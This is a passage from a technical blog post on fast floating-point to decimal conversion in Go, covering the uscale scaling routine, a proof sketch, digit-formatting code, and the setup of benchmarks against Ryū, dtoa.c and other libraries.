It needs to call <code>uscale</code> with a 55-bit <math><mi>x</mi></math>, <math><mrow><mi>e</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>1137</mn><mo>,</mo><mn>960</mn><mo stretchy=false>]</mo></mrow></math>, and <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>292</mn><mo>,</mo><mn>324</mn><mo stretchy=false>]</mo></mrow></math>.
<li>
<code>Parse</code> converts decimal to floating-point.
It needs to call <code>uscale</code> with a 64-bit <math><mi>x</mi></math> and <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>343</mn><mo>,</mo><mn>289</mn><mo stretchy=false>]</mo></mrow></math>.
(Outside that range of <math><mi>p</mi></math>, <code>Parse</code> can return 0 or infinity.)</ul>
<p>
So the table needs to provide answers for <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>343</mn><mo>,</mo><mn>341</mn><mo stretchy=false>]</mo></mrow></math>.
<p>
If <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo>≈</mo><mtext><i>pm</i></mtext><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mtext><i>pe</i></mtext></msup></mrow></math>, then <math><mrow><mi>x</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo>≈</mo><mi>x</mi><mo>·</mo><mtext><i>pm</i></mtext><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><mi>e</mi><mo>+</mo><mtext><i>pe</i></mtext></mrow></msup></mrow></math>.
In all of our algorithms, the result of <code>uscale</code> was always small—at most 64 bits.
Since <math><mtext><i>pm</i></mtext></math> is 128 bits and <math><mrow><mi>x</mi><mo>·</mo><mtext><i>pm</i></mtext></mrow></math> is even bigger, <math><mrow><mi>e</mi><mo>+</mo><mtext><i>pe</i></mtext></mrow></math> must be negative,
so this computation is
<code>(x*pm) >> -(e+pe)</code>.
Because of the ceiling, <math><mtext><i>pm</i></mtext></math> may be too large by an error <math><mrow><mi>ε</mi><msub><mspace height='0em' /><mn>0</mn></msub><mo><</mo><mn>1</mn></mrow></math>,
so <math><mrow><mi>x</mi><mo>·</mo><mtext><i>pm</i></mtext></mrow></math> may be too large by an error <math><mrow><mi>ε</mi><msub><mspace height='0em' /><mn>1</mn></msub><mo>=</mo><mi>x</mi><mo>·</mo><mi>ε</mi><msub><mspace height='0em' /><mn>0</mn></msub><mo><</mo><mi>x</mi></mrow></math>.
To round exactly, we care whether any of the shifted bits is 1,
but <math><mrow><mi>ε</mi><msub><mspace height='0em' /><mn>1</mn></msub></mrow></math> may change the low <math><mrow><mtext>bits</mtext><mo stretchy=false>(</mo><mi>x</mi><mo stretchy=false>)</mo></mrow></math> bits,
so we can’t trust them.
Instead, we will throw them away.
and use only the upper bits to compute our unrounded number.
That is the entire idea!
<p>
Now let’s look at the implementation.
The <code>prescale</code> function returns a <code>scaler</code> with <math><mtext><i>pm</i></mtext></math> and a shift count <math><mi>s</mi></math>:
<div class=showcode><pre><span class=showcode-comment>// A scaler holds derived scaling constants for a given e, p pair.</span>
type scaler struct {
pm pmHiLo
s int
}
<span class=showcode-comment>// A pmHiLo represents hi<<64 + lo.</span>
type pmHiLo struct {
hi uint64
lo uint64
}</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/unopt/fpfmt.go#L256-L265">fpfmt/unopt/fpfmt.go:256,265</a></div><div class=showcode-end></div>
<p>
We want the shift count to reserve two extra bits for the unrounded
representation and to apply to the top 64-bit word of the 192-bit product,
which gives this formula:<div class=math><math display=block><mtable><mtr><mtd><mi>s</mi></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo>−</mo><mo stretchy=false>(</mo><mi>e</mi><mo>+</mo><mtext><i>pe</i></mtext><mo stretchy=false>)</mo><mo>−</mo><mn>2</mn><mo>−</mo><mo stretchy=false>(</mo><mn>192</mn><mo>−</mo><mn>64</mn><mo stretchy=false>)</mo></mrow></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo>−</mo><mo stretchy=false>(</mo><mi>e</mi><mo>+</mo><mrow><mo stretchy=false>⌊</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>2</mn></msub><mspace width='0.166em' /></mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo stretchy=false>⌋</mo></mrow><mo>−</mo><mn>127</mn><mo stretchy=false>)</mo><mo>−</mo><mn>2</mn><mo>−</mo><mn>128</mn></mrow></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo>−</mo><mo stretchy=false>(</mo><mi>e</mi><mo>+</mo><mrow><mo stretchy=false>⌊</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>2</mn></msub><mspace width='0.166em' /></mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo stretchy=false>⌋</mo></mrow><mo>+</mo><mn>3</mn><mo stretchy=false>)</mo></mrow></mtd></mtr></mtable></math></div>
<p>
That translates directly to Go:
<div class=showcode><pre><span class=showcode-comment>// prescale returns the scaling constants for e, p.</span>
<span class=showcode-comment>// lp must be log2Pow10(p).</span>
func prescale(e, p, lp int) scaler {
return scaler{pm: pow10Tab[p-pow10Min], s: -(e + lp + 3)}
}</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/fpfmt.go#L292-L295">fpfmt/fpfmt.go:292,295</a></div><div class=showcode-end></div>
<p>
In <code>uscale</code>, since the caller left-justified <math><mi>x</mi></math> to 64 bits,
discarding the low <math><mrow><mtext>bits</mtext><mo stretchy=false>(</mo><mi>x</mi><mo stretchy=false>)</mo></mrow></math> bits means discarding the
lowest 64 bits of the product, which we skip computing entirely.
Then we use the middle 64-bit word and the low <math><mi>s</mi></math> bits
of the upper word to set the sticky bit in the result.
<div class=showcode><pre><span class=showcode-comment>// uscale returns unround(x * 2**e * 10**p).</span>
<span class=showcode-comment>// The caller should pass c = prescale(e, p, log2Pow10(p))</span>
<span class=showcode-comment>// and should have left-justified x so its high bit is set.</span>
func uscale(x uint64, c scaler) unrounded {
hi, mid := bits.Mul64(x, c.pm.hi)
mid2, _ := bits.Mul64(x, c.pm.lo)
mid, carry := bits.Add64(mid, mid2, 0)
hi += carry
sticky := bool2[unrounded](mid != 0 || hi&((1<<c.s)-1) != 0)
return unrounded(hi>>c.s) | sticky
}</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/unopt/fpfmt.go#L302-L311">fpfmt/unopt/fpfmt.go:302,311</a></div><div class=showcode-end></div>
<p>
It is mind-boggling that this works, but it does.
Of course, you shouldn’t take my word for it.
We have to prove it correct.
<a class=anchor href="#sketch_of_a_proof_of_fast_scaling"><h2 id="sketch_of_a_proof_of_fast_scaling">Sketch of a Proof of Fast Scaling</h2></a>
<p>
To prove that our fast <code>uscale</code> algorithm is correct,
there are three cases: small positive <math><mi>p</mi></math>,
small negative <math><mi>p</mi></math>,
and large <math><mi>p</mi></math>.
The actual proof, especially for large <math><mi>p</mi></math>,
is non-trivial,
and the details are quite a detour from
our fast scaling implementations,
so this section only sketches the basic ideas.
For the details, see the accompanying post, “<a href="fp-proof">Fast Unrounded Scaling: Proof by Ivy</a>.”
<p>
Remember from the previous section that <math><mrow><mtext><i>pm</i></mtext><mo>=</mo><mrow><mo stretchy=false>⌈</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mn>/2</mn><msup><mspace height='0.66em' /><mtext><i>pe</i></mtext></msup><mo stretchy=false>⌉</mo></mrow><mo>=</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mn>/2</mn><msup><mspace height='0.66em' /><mtext><i>pe</i></mtext></msup><mo>+</mo><mi>ε</mi><msub><mspace height='0em' /><mn>0</mn></msub></mrow></math> for some <math><mrow><mi>ε</mi><msub><mspace height='0em' /><mn>0</mn></msub><mo><</mo><mn>1</mn></mrow></math>.
Since <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo>=</mo><mn>5</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math>,
<math><mtext><i>pm</i></mtext></math>’s 128 bits need only represent the <math><mrow><mn>5</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math> part; the <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math> can always be handled by <math><mtext><i>pe</i></mtext></math>.
<p>
For <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>27</mn><mo stretchy=false>)</mo></mrow></math>, <math><mrow><mn>5</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math> fits in the top 64 bits of the 128-bit <math><mtext><i>pm</i></mtext></math>.
Since <math><mtext><i>pm</i></mtext></math> is exact,
the only possible error is introduced by discarding the bottom <math><mrow><mtext>bits</mtext><mo stretchy=false>(</mo><mi>x</mi><mo stretchy=false>)</mo></mrow></math> bits.
Since the bottom 64 bits of <math><mtext><i>pm</i></mtext></math> are zero,
the bits we discard are all zero.
So <code>uscale</code> is correct for small positive <math><mi>p</mi></math>.
<p>
For <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>27</mn><mo>,</mo><MO form='prefix'>−</MO><mn>1</mn><mo stretchy=false>]</mo></mrow></math>,
<math><mrow><mi>x</mi><mo>·</mo><mtext><i>pm</i></mtext></mrow></math> is approximating division by <math><mrow><mn>5</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mi>p</mi></mrow></msup></mrow></math> (remember that <math><mrow><MO form='prefix'>−</MO><mi>p</mi></mrow></math> is a positive number!).
The 128-bit approximation is precise enough that when <math><mi>x</mi></math> is a
multiple of <math><mrow><mn>5</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mi>p</mi></mrow></msup></mrow></math>, only the lowest <math><mrow><mi>b</mi><mi>i</mi><mi>t</mi><mi>s</mi><mo stretchy=false>(</mo><mi>x</mi><mo stretchy=false>)</mo></mrow></math> bits are non-zero;
discarding them keeps the unrounded form exact.
And when <math><mi>x</mi></math> is not a multiple of <math><mrow><mn>5</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mi>p</mi></mrow></msup></mrow></math>,
the result has a fractional part that must be at least
<math><mrow><mn>1/5</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mi>p</mi></mrow></msup></mrow></math> away from an integer.
That fractional separation is much larger than the maximum error in the product,
so the high bits saved in the unrounded form are correct;
the fraction is also repeating, so that there is guaranteed
to be a 1 bit to cause the unrounded form to be marked inexact.
So <code>uscale</code> is correct for small negative <math><mi>p</mi></math>.
<p>
Finally, we must handle large <math><mi>p</mi></math>, which always have a non-zero error
and therefore should always return unrounded numbers marked inexact
(with the sticky bit set to 1).
Consider the effect of adding a small error to the idealized “correct” <math><mrow><mi>x</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mn>/2</mn><msup><mspace height='0.66em' /><mtext><i>pe</i></mtext></msup></mrow></math>,
producing <math><mrow><mi>x</mi><mo>·</mo><mtext><i>pm</i></mtext></mrow></math>.
The error is at most 64 bits.
Adding that error to the 192-bit product can certainly affect
the low 64 bits, and it may also generate a carry out of the low 64
into the middle 64 bits.
The carry turns 1 bits into 0 bits from right to left
until it hits a 0 bit;
that first 0 bit becomes a 1, and the carry stops.
The key insight is that seeing a 1 in the middle bits
is proof that the carry did not reach the high bits,
so the high bits are correct.
(Seeing a 1 in the middle bits also ensures that
the unrounded form is marked inexact, as it must be,
even though we discarded the low bits.)
Using a program backed by careful math, we can analyze all the <math><mtext><i>pm</i></mtext></math> in our table,
showing that every possible <math><mrow><mi>x</mi><mo>·</mo><mtext><i>pm</i></mtext></mrow></math> has a 1 in the middle bits.
So <code>uscale</code> is correct for large <math><mi>p</mi></math>.
<a class=anchor href="#omit_needless_multiplications"><h2 id="omit_needless_multiplications">Omit Needless Multiplications</h2></a>
<p>
We have a fast and correct <code>uscale</code>, but we can make it faster
now that we understand the importance of carry bits.
The idea is to compute the high 64 bits of the product
and then use it directly whenever possible, avoiding the computation
of the remaining 64 bits at all.
To make this work, we need the high 64 bits to be rounded up,
a ceiling instead of a floor.
So we will change the <code>pmHiLo</code> from representing <math><mrow><mtext><i>hi</i></mtext><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>64</mn></msup><mo>+</mo><mtext><i>lo</i></mtext></mrow></math>
to <math><mrow><mtext><i>hi</i></mtext><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>64</mn></msup><mo>−</mo><mtext><i>lo</i></mtext></mrow></math>.
<div class=showcode><pre><span class=showcode-comment>// A pmHiLo represents hi<<64 - lo.</span>
type pmHiLo struct {
hi uint64
lo uint64
}</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/fpfmt.go#L280-L283">fpfmt/fpfmt.go:280,283</a></div><div class=showcode-end></div>
<p>
The exact computation using this form would be:
<pre>hi, mid := bits.Mul64(x, c.pm.hi)
mid2, lo := bits.Mul64(x, c.pm.lo)
mid, carry := bits.Sub64(mid, mid2, bool2[uint64](lo > 0))
hi -= carry
return unrounded(hi >> c.s) | bool2[unrounded](hi&((1<<c.s)-1) != 0 || mid != 0)
</pre>
<p>
The 128-bit product <math><mrow><mi>x</mi><mo>·</mo><mtext><i>pm</i></mtext><mn>.</mn><mtext><i>hi</i></mtext></mrow></math> computed on the first line
may be too big by an error of up to <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mn>64</mn></msup></mrow></math>,
which may or may not affect the high 64 bits;
The middle three lines correct the product,
possibly subtracting 1 from <math><mtext><i>hi</i></mtext></math>.
Like in the proof sketch, if any of the bottom <math><mi>s</mi></math> bits of the approximate <math><mtext><i>hi</i></mtext></math> is a 1 bit,
that 1 bit would stop the subtracted carry from
affecting the higher bits, indicating that we don’t need to correct the product.
<p>
Using this insight, the optimized <code>uscale</code> is:
<div class=showcode><pre><span class=showcode-comment>// uscale returns unround(x * 2**e * 10**p).</span>
<span class=showcode-comment>// The caller should pass c = prescale(e, p, log2Pow10(p))</span>
<span class=showcode-comment>// and should have left-justified x so its high bit is set.</span>
func uscale(x uint64, c scaler) unrounded {
hi, mid := bits.Mul64(x, c.pm.hi)
sticky := uint64(1)
if hi&(1<<(c.s&63)-1) == 0 {
mid2, _ := bits.Mul64(x, c.pm.lo)
sticky = bool2[uint64](mid-mid2 > 1)
hi -= bool2[uint64](mid < mid2)
}
return unrounded(hi>>c.s | sticky)
}</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/fpfmt.go#L298-L309">fpfmt/fpfmt.go:298,309</a></div><div class=showcode-end></div>
<p>
The fix-up looks different from the exact computation above
but it has the same effect.
We don’t need the actual final value of <math><mtext><i>mid</i></mtext></math>, only the carry
and its effect on the sticky bit.
<p>
On some systems, notably x86-64, <code>bits.Mul64</code> computes both results in a single instruction.
On other systems, notably ARM64, <code>bits.Mul64</code> must use two different instructions;
it helps on those systems to write the code this way,
optimizing away the computation for the low half of <math><mrow><mi>x</mi><mo>·</mo><mtext><i>pm</i></mtext><mn>.</mn><mtext><i>lo</i></mtext></mrow></math>.
<p>
The more bits that are being shifted out of <code>hi</code>,
the more likely it is that a 1 bit is being shifted out,
so that we have an answer after only the first <code>bits.Mul64</code>.
When <code>Short</code> calls <code>uscale</code>, it passes two <math><mi>x</mi></math> that
differ only in a single bit
and multiplies them by the same <math><mrow><mtext><i>pm</i></mtext><mn>.</mn><mtext><i>hi</i></mtext></mrow></math>.
While one of them might clear the low <math><mi>s</mi></math> bits of <math><mtext><i>hi</i></mtext></math>,
the other is unlikely to also clear them,
so we are likely to hit the fast path at least once,
if not twice.
In the case where <code>Short</code> calls <code>uscale</code> three times,
we are likely to hit the fast path at least twice.
This optimization means that, most of the time, a <code>uscale</code>
is implemented by a single wide multiply.
This is the main reason that <code>Short</code> runs faster than
Ryū, Schubfach, and Dragonbox, as we will see in the next section.
<a class=anchor href="#performance"><h2 id="performance">Performance</h2></a>
<p>
I promised these algorithms would be simple <i>and</i> fast.
I hope you are convinced about simple.
(If not, keep in mind that the implementations in widespread
use today are far more complicated!)
Now it is time to evaluate ‘fast’
by comparing against other implementations.
All the other implementations are written in C or C++ and compiled by a C/C++ compiler.
To isolate compilation differences,
I translated the Go code to C and measured
both the Go code and the C translation.
<p>
I ran the benchmarks on two systems.
<ul>
<li>
Apple M4 (2025 MacBook Air ‘Mac16,12’), 32 GB RAM, macOS 26.1, Apple clang 17.0.0 (clang-1700.6.3.2)
<li>
AMD Ryzen 9 7950X, 128 GB RAM, Linux 6.17.9 and libc6 2.39-0ubuntu8.6, Ubuntu clang 18.1.3 (1ubuntu1)</ul>
<p>
Both systems used Go 1.26rc1.
The full benchmark code is in the <a href="https://pkg.go.dev/rsc.io/fpfmt"><code>rsc.io/fpfmt</code> package</a>.
<a class=anchor href="#printing_text"><h3 id="printing_text">Printing Text</h3></a>
<p>
Real implementations generate strings, so we need to write
code to convert the integers we have been returning into digit sequences,
like this:
<div class=showcode><pre><span class=showcode-comment>// formatBase10 formats the decimal representation of u into a.</span>
<span class=showcode-comment>// The caller is responsible for ensuring that a is big enough to hold u.</span>
<span class=showcode-comment>// If a is too big, leading zeros will be filled in as needed.</span>
func formatBase10(a []byte, u uint64) {
for nd := len(a) - 1; nd >= 0; nd-- {
a[nd] = byte(u%10 + '0')
u /= 10
}
}</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/unopt/fpfmt.go#L368-L375">fpfmt/unopt/fpfmt.go:368,375</a></div><div class=showcode-end></div>
<p>
Unfortunately, if we connect our fast <code>FixedWidth</code> and <code>Short</code> to this
version of <code>formatBase10</code>, benchmarks spend most of their time in the formatting loop.
There are a variety of clever ways to speed up digit formatting.
For our purposes, it suffices to use the old trick of
splitting the number into two-digit chunks and
then converting each chunk by
indexing a 200-byte lookup table (more precisely, a “lookup string”) of all 2-digit values from 00 to 99:
<div class=showcode><pre><span class=showcode-comment>// i2a is the formatting of 00..99 concatenated,</span>
<span class=showcode-comment>// a lookup table for formatting [0, 99].</span>
const i2a = "00010203040506070809" +
"10111213141516171819" +
"20212223242526272829" +
"30313233343536373839" +
"40414243444546474849" +
"50515253545556575859" +
"60616263646566676869" +
"70717273747576777879" +
"80818283848586878889" +
"90919293949596979899"</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/fpfmt.go#L353-L363">fpfmt/fpfmt.go:353,363</a></div><div class=showcode-end></div>
<p>
Using this table and unrolling the loop to allow the
compiler to optimize away bounds checks, we end up with <code>formatBase10</code>:
<div class=showcode><pre><span class=showcode-comment>// formatBase10 formats the decimal representation of u into a.</span>
<span class=showcode-comment>// The caller is responsible for ensuring that a is big enough to hold u.</span>
<span class=showcode-comment>// If a is too big, leading zeros will be filled in as needed.</span>
func formatBase10(a []byte, u uint64) {
nd := len(a)
for nd >= 8 {
<span class=showcode-comment>// Format last 8 digits (4 pairs).</span>
x3210 := uint32(u % 1e8)
u /= 1e8
x32, x10 := x3210/1e4, x3210%1e4
x1, x0 := (x10/100)*2, (x10%100)*2
x3, x2 := (x32/100)*2, (x32%100)*2
a[nd-1], a[nd-2] = i2a[x0+1], i2a[x0]
a[nd-3], a[nd-4] = i2a[x1+1], i2a[x1]
a[nd-5], a[nd-6] = i2a[x2+1], i2a[x2]
a[nd-7], a[nd-8] = i2a[x3+1], i2a[x3]
nd -= 8
}
x := uint32(u)
if nd >= 4 {
<span class=showcode-comment>// Format last 4 digits (2 pairs).</span>
x10 := x % 1e4
x /= 1e4
x1, x0 := (x10/100)*2, (x10%100)*2
a[nd-1], a[nd-2] = i2a[x0+1], i2a[x0]
a[nd-3], a[nd-4] = i2a[x1+1], i2a[x1]
nd -= 4
}
if nd >= 2 {
<span class=showcode-comment>// Format last 2 digits.</span>
x0 := (x % 1e2) * 2
x /= 1e2
a[nd-1], a[nd-2] = i2a[x0+1], i2a[x0]
nd -= 2
}
if nd > 0 {
<span class=showcode-comment>// Format final digit.</span>
a[0] = byte('0' + x)
}
}</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/fpfmt.go#L366-L405">fpfmt/fpfmt.go:366,405</a></div><div class=showcode-end></div>
<p>
This is more code than I’d prefer, but it is at least straightforward.
I’ve seen much more complex versions.
<p>
With <code>formatBase10</code>, we can build <code>Fmt</code>, which formats in standard exponential notation:
<div class=showcode><pre><span class=showcode-comment>// Fmt formats d, p into s in exponential notation.</span>
<span class=showcode-comment>// The caller must pass nd set to the number of digits in d.</span>
<span class=showcode-comment>// It returns the number of bytes written to s.</span>
func Fmt(s []byte, d uint64, p, nd int) int {
<span class=showcode-comment>// Put digits into s, leaving room for decimal point.</span>
formatBase10(s[1:nd+1], d)
p += nd - 1
<span class=showcode-comment>// Move first digit up and insert decimal point.</span>
s[0] = s[1]
n := nd
if n > 1 {
s[1] = '.'
n++
}
<span class=showcode-comment>// Add 2- or 3-digit exponent.</span>
s[n] = 'e'
if p < 0 {
s[n+1] = '-'
p = -p
} else {
s[n+1] = '+'
}
if p < 100 {
s[n+2] = i2a[p*2]
s[n+3] = i2a[p*2+1]
return n + 4
}
s[n+2] = byte('0' + p/100)
s[n+3] = i2a[(p%100)*2]
s[n+4] = i2a[(p%100)*2+1]
return n + 5
}</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/fpfmt.go#L312-L344">fpfmt/fpfmt.go:312,344</a></div><div class=showcode-end></div>
<p>
When calling <code>Fmt</code> with a <code>FixedWidth</code> result, we know the digit count <code>nd</code> already.
For a <code>Short</code> result, we can compute the digit count easily from the bit length:
<div class=showcode><pre><span class=showcode-comment>// Digits returns the number of decimal digits in d.</span>
func Digits(d uint64) int {
nd := log10Pow2(bits.Len64(d))
return nd + bool2[int](d >= uint64pow10[nd])
}</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/fpfmt.go#L347-L350">fpfmt/fpfmt.go:347,350</a></div><div class=showcode-end></div>
<a class=anchor href="#fixed-width_performance"><h3 id="fixed-width_performance">Fixed-Width Performance</h3></a>
<p>
To evaluate fixed-width printing,
we need to decide which floating-point values to convert.
I generated 10,000 uint64s in the range <math><mrow><mo stretchy=false>[</mo><mn>1</mn><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>63</mn></msup><mo>−</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>52</mn></msup><mo stretchy=false>)</mo></mrow></math> and used them as
float64 bit patterns.
The limited range avoids negative numbers, infinities, and NaNs.
The benchmarks all use Go’s
<a href="https://go.dev/blog/chacha8rand">ChaCha8-based generator</a>
with a fixed seed for reproducibility.
To reduce timing overhead, the benchmark builds an array of 1000 copies of the value
and calls a function that converts every value in the array in sequence.
To reduce noise, the benchmark times that function call 25 times and uses the median timing.
We also have to decide how many digits to ask for:
longer sequences are more difficult.
Although I investigated a wider range, in this post I’ll show
two representative widths: 6 digits (C <code>printf</code>’s default) and 17 digits
(the minimum to guarantee accurate round trips, so widely used).
<p>
The implementations I timed are:
<ul>
<li>
<b>dblconv</b>: Loitsch’s <a href="https://github.com/google/double-conversion">double-conversion library</a>, using the <code>ToExponential</code> function.
This library, used in Google Chrome,
implements a handful of special cases for small binary exponents
and falls back to a bignum-based printer for larger exponents.
<li>
<b>dmg1997</b>: Gay’s <a href="https://netlib.org/fp/"><code>dtoa.c</code></a>, <a href="https://web.archive.org/web/19970415033207/https://www.netlib.org/fp/dtoa.c">archived in 1997</a>.
For our purposes, this represents Gay’s original C implementation
described in his technical report from 1990 [<a class=footref id='fnref-11' href='#fn-11'>11</a>].
I confirmed that this 1997 snapshot runs at the same speed as
(and has no significant code changes compared to)
another copy dating back to May 1991 or earlier.
<li>
<b>dmg2017</b>: Gay’s <a href="https://netlib.org/fp/"><code>dtoa.c</code></a>, <a href="https://web.archive.org/web/20170421060916/https://www.netlib.org/fp/dtoa.c">archived in 2017</a>.
In 2017, Gay published an updated version of <code>dtoa.c</code> that uses <code>uint64</code> math and
a table of 96-bit powers of ten. It is significantly faster than the original version (see below).
In November 2025, I confirmed that the latest version runs at the same speed as this one.
<li>
<b>libc</b>:
The C standard library conversion using <code>sprintf("%.*e", prec-1)</code>.
The conversion algorithm varies by C library.
The macOS C library seems to wrap a pre-2017 version of <code>dtoa.c</code>,
while Linux’s glibc uses its own bignum-based code.
In general the C library implementations have not kept pace
with recent algorithms and are slower than any of the others.
<li>
<b>ryu</b>: Adams’s <a href="https://github.com/ulfjack/ryu">Ryū library</a>, using the <code>d2exp_buffered</code> function.
It uses the Ryū Printf algorithm [<a class=footref id='fnref-3-2' href='#fn-3'>3</a>].
<li>
<b>uscale</b>: The unrounded scaling approach, using the Go code in this post.
<li>
<b>uscalec</b>: A C translation of the unrounded scaling Go code.</ul>
<p>
Here is a scatterplot showing the times required to format <math><mi>f</mi></math> to 17 digits,
running on the Linux system:
<p>
<a href="fpfmt/plot/fpfmt-ryzen-fixed17-scat-big.svg"><img name="fpfmt/plot/fpfmt-ryzen-fixed17-scat" class="center pad" width=600 height=300 src="fpfmt/plot/fpfmt-ryzen-fixed17-scat.png" srcset="fpfmt/plot/fpfmt-ryzen-fixed17-scat.png 1x, fpfmt/plot/fpfmt-ryzen-fixed17-scat@1.5x.png 1.5x, fpfmt/plot/fpfmt-ryzen-fixed17-scat@2x.png 2x, fpfmt/plot/fpfmt-ryzen-fixed17-scat@3x.png 3x, fpfmt/plot/fpfmt-ryzen-fixed17-scat@4x.png 4x, fpfmt/plot/fpfmt-ryzen-fixed17-scat@6.png 6, fpfmt/plot/fpfmt-ryzen-fixed17-scat@6x2.png 6x2"></a>
<p>
(Click on any of the graphs in this post for a larger view.)
<p>
The X axis is the log of the floating point input <math><mi>f</mi></math>,
and
the Y axis is the time required for a single conversion of the given input.
The scatterplot makes many things clear. For example, it is obvious that
there are two kinds of implementations.
Those that use bignums take longer for large exponents and
have a “winged” scatterplot,
while those that avoid bignums run at a mostly constant speed across
the entire exponent range.
The scatterplot also highlights many interesting data-dependent patterns in the timings,
most of which I have not investigated.
A friend remarked that you could probably spend a whole career
analyzing the patterns in this one plot.
<p>
For our purposes, it would help to have a clearer comparison
of the speed of the different algorithms.
The right tool for that is a plot of the cumulative distribution function (CDF),
which looks like this:
<p>
<a href="fpfmt/plot/fpfmt-ryzen-fixed17-cdf-big.svg"><img name="fpfmt/plot/fpfmt-ryzen-fixed17-cdf" class="center pad" width=400 height=300 src="fpfmt/plot/fpfmt-ryzen-fixed17-cdf.png" srcset="fpfmt/plot/fpfmt-ryzen-fixed17-cdf.png 1x, fpfmt/plot/fpfmt-ryzen-fixed17-cdf@1.5x.png 1.5x, fpfmt/plot/fpfmt-ryzen-fixed17-cdf@2x.png 2x, fpfmt/plot/fpfmt-ryzen-fixed17-cdf@3x.png 3x, fpfmt/plot/fpfmt-ryzen-fixed17-cdf@4x.png 4x"></a>
<p>
Now time is on the X axis (still log scale), and the Y axis plots what
fraction of the inputs ran in that time or less.
For example, we can see that dblconv’s fast path applies to most inputs,
but its slow path is much slower than Linux glibc or
even Gay’s original C library.
<p>
The CDF only plots the middle 99.9% of timings
(dropping the 0.05% fastest and slowest),
to avoid tails caused by measurement noise.
In general, measurements are noisier on the Mac because
ARM64 timers only provide ~20ns precision,
compared to the x86’s sub-nanosecond precision.
<p>
Here are the scatterplots and CDFs for 6-digit output on the two systems:
</div></div>
<div class=main-wide>
<style>
</style>
<table class=md id=_table2>
<tr class=th><th></th><th></th></tr>
<tr><td><a href="fpfmt/plot/fpfmt-apple-fixed6-scat-big.svg"><img name="fpfmt/plot/fpfmt-apple-fixed6-scat" class="center pad" width=600 height=300 src="fpfmt/plot/fpfmt-apple-fixed6-scat.png" srcset="fpfmt/plot/fpfmt-apple-fixed6-scat.png 1x, fpfmt/plot/fpfmt-apple-fixed6-scat@1.5x.png 1.5x, fpfmt/plot/fpfmt-apple-fixed6-scat@2x.png 2x, fpfmt/plot/fpfmt-apple-fixed6-scat@3x.png 3x, fpfmt/plot/fpfmt-apple-fixed6-scat@4x.png 4x"></a></td><td><a href="fpfmt/plot/fpfmt-apple-fixed6-cdf-big.svg"><img name="fpfmt/plot/fpfmt-apple-fixed6-cdf" class="center pad" width=400 height=300 src="fpfmt/plot/fpfmt-apple-fixed6-cdf.png" srcset="fpfmt/plot/fpfmt-apple-fixed6-cdf.png 1x, fpfmt/plot/fpfmt-apple-fixed6-cdf@1.5x.png 1.5x, fpfmt/plot/fpfmt-apple-fixed6-cdf@2x.png 2x, fpfmt/plot/fpfmt-apple-fixed6-cdf@3x.png 3x, fpfmt/plot/fpfmt-apple-fixed6-cdf@4x.png 4x"></a></td></tr>
